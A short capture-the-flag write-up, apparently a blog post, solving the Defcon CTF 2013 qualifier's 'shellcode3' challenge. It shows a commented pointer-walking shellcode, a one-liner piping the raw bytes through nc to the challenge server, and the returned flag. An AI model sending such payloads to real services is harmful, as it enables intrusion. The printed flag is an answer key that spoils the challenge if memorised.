CTF/2013
Defcon CTF 2013 Qual - shellcode3 (Exploit only)
pwn3r_45
2013. 7. 7. 19:08
Category : Pwnable (\xff\xe4\xcc)
(empty) |
Summary : short shellcoding, reuse pointer in ecx
/* 00A21E80 8B09 MOV ECX,DWORD PTR DS:[ECX] 00A21E82 8D41 05 LEA EAX,DWORD PTR DS:[ECX+5] 00A21E85 66:8138 4141 CMP WORD PTR DS:[EAX],4141 00A21E8A ^75 F4 JNZ SHORT 00A21E80 00A21E8C C3 RETN */ root@ubuntu:~# (python -c 'print "\x8b\x09\x8d\x41\x05\x66\x81\x38\x41\x41\x75\xf4\xc3"')| nc linked2.shallweplayaga.me 22222 List built. Send me your shellcode. Max size: 16 AAAThe key is: Who says ESP isn't general purpose!?!? |